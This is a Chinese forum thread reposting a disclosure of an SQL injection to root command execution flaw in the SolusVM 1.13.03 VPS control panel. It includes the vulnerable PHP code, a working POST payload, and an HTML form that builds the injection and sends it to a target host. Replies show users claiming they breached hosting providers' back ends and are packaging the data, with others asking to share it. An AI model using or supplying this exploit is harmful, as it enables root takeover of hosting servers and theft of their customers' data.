【干货】美国VPS管理系统SolusVM 1.13.03 SQL注入漏洞（含exp）

过客

相信这几天用SolusVM的同学都提心吊胆了好多天吧……

做好数据备份的同学淡定地用吧……

============以上是废话============

披露漏洞的博主地址：http://localhost.re/p/solusvm-11303-vulnerabilities
本文转载自：http://www.freebuf.com/vuls/10611.html

SolusVM 1.13.03 Vulnerabilities
2013/06/16

/centralbackup.php:

1. <?php
   
2. if ($_POST['delete']) {
   
3.     $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
   
4.     #[...]
   
5.     if ($xc[status] == 'failed') {
   
6.            exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
   
7.     #[...]
   
8.     }
   
9. }
   
10. ?>

复制代码

到了这里我们该怎么做的？SQL注入？exec()？setuid为0？都正确！ 让我们来看看exp是怎样的？非常简单的三步

1. 1.在激活的VM中拥有一个账户
   
2. 2.登陆，在VM中点击，拷贝GET _v值
   
3. 3.POST 至/centralbackup.php?_v=[value]

复制代码

1. delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#

复制代码

或者使用以下Html表单

1. <html><body>
   
2.      <script>
   
3.      function construct() {
   
4.          var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
   
5.          document.forms['form']['deleteid'].value=sql;
   
6.          return true;
   
7.      }
   
8.      </script>
   
9.      <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
   
10.      <input type='hidden' name='delete' value='1'>
    
11.      CMD: <input type='text' name='deleteid' size='100'>
    
12.      <br><input type='submit'>
    
13.      </form>
    
14. </body></html>

复制代码

vagaa

zmban

誓誓

耶，成功注入饭桶家后台，打包数据中，，，，

莫桑比特

誓誓 发表于 2013-6-21 10:57
耶，成功注入饭桶家后台，打包数据中，，，，

求分享

分享吧

还是 看不懂.....

SKIDROW

有的已经补了，还是WHMCS的库好。

DOS

耶，成功注入单手MJJ家的

sdgl212

不明觉厉

ohmyga

禁止跨域提交